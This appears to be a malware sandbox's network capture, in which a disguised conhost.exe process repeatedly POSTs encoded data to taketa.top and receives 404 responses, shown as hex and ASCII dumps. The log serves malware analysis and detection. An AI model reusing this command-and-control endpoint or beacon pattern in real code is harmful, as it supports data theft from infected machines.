Apr 26, 2024 05:17:25.243611097 CEST	192.168.2.4	1.1.1.1	0xf189	Standard query (0)	taketa.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 05:17:25.684423923 CEST	1.1.1.1	192.168.2.4	0xf189	No error (0)	taketa.top		104.21.16.102	A (IP address)	IN (0x0001)	false
Apr 26, 2024 05:17:25.684423923 CEST	1.1.1.1	192.168.2.4	0xf189	No error (0)	taketa.top		172.67.167.60	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

taketa.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.21.16.102	80	7184	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:17:25.838541985 CEST	338	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:17:25.986197948 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:17:25.987226009 CEST	344	OUT	Data Raw: 00 01 04 03 03 0d 01 00 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54 Data Ascii: Q[T[QQTQV\L~ChYzwL_b\h@koitU`L~sUZlx_{bK\|pC`gU\~_~V@BxmbN~LW
Apr 26, 2024 05:17:26.432651997 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:17:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXse2RoLCKT8rgKz9iWVD5zWud017pmY1UOATwvwzj5cPjVXegI5HwxouKVEiYKsMWcbEb9Id%2B9OiGIvXg2ixaBwaZSKZyyH%2FnIreAncgqjM8TrRjYMZB4kVwlMe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36b74fc6e9ac0-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The request
Apr 26, 2024 05:17:26.432676077 CEST	557	IN	Data Raw: 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 Data Ascii: ed URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection#
Apr 26, 2024 05:17:26.432715893 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.4	49738	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:17:55.506360054 CEST	285	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:17:55.652987957 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:17:55.653254032 CEST	344	OUT	Data Raw: 00 01 04 0c 03 0a 04 05 05 06 02 01 02 07 01 06 00 05 05 09 02 01 03 0f 07 00 0e 05 05 57 01 07 0c 56 07 0f 07 0d 07 05 0c 05 05 50 05 07 07 0e 05 0a 0c 5b 0e 01 06 55 06 57 06 02 04 55 06 58 02 0b 0f 5b 05 02 04 02 0e 55 0b 06 0c 03 0f 06 06 03 Data Ascii: WVP[UWUX[UQVUR\L~~pbvaqLweRhoiLwllZk^oRwxp~JkSQQtYhN}_~V@A{mnN~bS
Apr 26, 2024 05:17:56.090440035 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:17:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lm22g23MiKymyeBNY43Bg3UuI45Qd%2BYpCRchCNA2ZghTpliqBc7SX4L5hLuEcTCrGKme8WLk8WxxBECtJ3kOVl1v5EHklVYDQ2a73TefUHt%2B9w%2FqKejvko2raHTe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36c2e5d33db2d-MIA alt-svc: h2=":443"; ma=60 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The requeste
Apr 26, 2024 05:17:56.090498924 CEST	556	IN	Data Raw: 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 Data Ascii: d URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection#7
Apr 26, 2024 05:17:56.090545893 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49739	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:04.927387953 CEST	338	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:05.089287996 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:05.089550972 CEST	344	OUT	Data Raw: 00 00 04 03 06 08 01 03 05 06 02 01 02 02 01 02 00 0a 05 0e 02 07 03 00 07 01 0e 00 03 03 06 03 0f 02 06 0d 00 57 05 0b 0c 03 07 57 05 51 05 00 07 04 0f 0c 0d 54 01 01 04 57 03 00 05 07 00 0f 00 00 0d 0a 00 06 01 02 0e 07 0d 03 0a 01 0e 54 07 0c Data Ascii: WWQTWT]\UR\L~h`zc[n]veoP\|lf]tRph`\|KlodZlvDtc^w^~e~V@xm\}LW
Apr 26, 2024 05:18:05.526119947 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rtdo1gzmI34v3wCPVUo3RHSjrWe7vuB6%2F4AFHltjAHVSlPRAgbyUA%2BJJZSsC6Uxt6AOPvjz5LiKW653oUYpGbj5cM%2FCtoi%2FMAVKnr8a6q%2FIBbGoQvtbLOHedCU4A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36c695cfa0351-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The r
Apr 26, 2024 05:18:05.526145935 CEST	563	IN	Data Raw: 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e Data Ascii: equested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-prote
Apr 26, 2024 05:18:05.526163101 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49740	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:06.649964094 CEST	273	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:06.797492027 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:06.797735929 CEST	344	OUT	Data Raw: 00 04 04 0c 06 0a 01 00 05 06 02 01 02 0c 01 02 00 0b 05 09 02 06 03 0d 02 00 0e 03 04 03 00 02 0f 55 06 0f 01 54 07 06 0b 0b 04 02 05 03 02 03 04 07 0c 5e 0d 05 04 55 01 01 04 0d 07 0a 00 00 05 05 0a 09 06 03 06 09 0f 57 0c 53 0c 07 0d 04 06 0c Data Ascii: UT^UWS][RWTU\L}Qk^ftauvep@UbXwBpkstolcEzsbkTpAcw\|j_~V@xmPN}\e
Apr 26, 2024 05:18:07.243365049 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YkJnvly6UKfWRmQpGUOTi4dKGRxrnjFaCWIGu7pqWdyjh0DvWErWpf%2FfD0AUfFVvJK60eeXrjwsJSiYqHrOWJnd%2Bx7vJhSwlm%2FTMM1rL1YQF%2B6Hi0EEPUfl7AjS0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36c740dc9221e-MIA alt-svc: h2=":443"; ma=60 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The reques
Apr 26, 2024 05:18:07.243408918 CEST	558	IN	Data Raw: 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 Data Ascii: ted URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection
Apr 26, 2024 05:18:07.243477106 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49741	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:13.157896042 CEST	285	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:13.305624962 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:13.305860043 CEST	344	OUT	Data Raw: 00 06 04 06 06 01 04 01 05 06 02 01 02 04 01 00 00 03 05 0f 02 0c 03 0b 00 06 0f 00 07 0f 00 01 0f 53 05 0f 01 04 04 0a 0d 05 07 51 07 53 05 04 04 06 0e 0e 0d 53 04 55 04 03 07 01 05 52 04 09 00 01 0f 0f 06 03 05 04 0f 05 0c 04 0c 0c 0b 09 04 54 Data Ascii: SQSSURTT\L~\|`u[cryv`OhR\^tR`\|swYylUlNiY\|m^NcwxAe~V@@xCvr}
Apr 26, 2024 05:18:13.744168043 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LlwNGy3rzV3RXDXFPdRMX%2FCG2LnhAz%2Bfq7PeY9Qg2ohwaPGfSayoZ9xlpWIznuSJF1LcwQb%2Bwg3Fx0D900WcPsN6%2Bx99cDGpZ5Io2qjKE5e53%2B3lg2JLknY8M12K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36c9cbf265c7d-MIA alt-svc: h2=":443"; ma=60 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 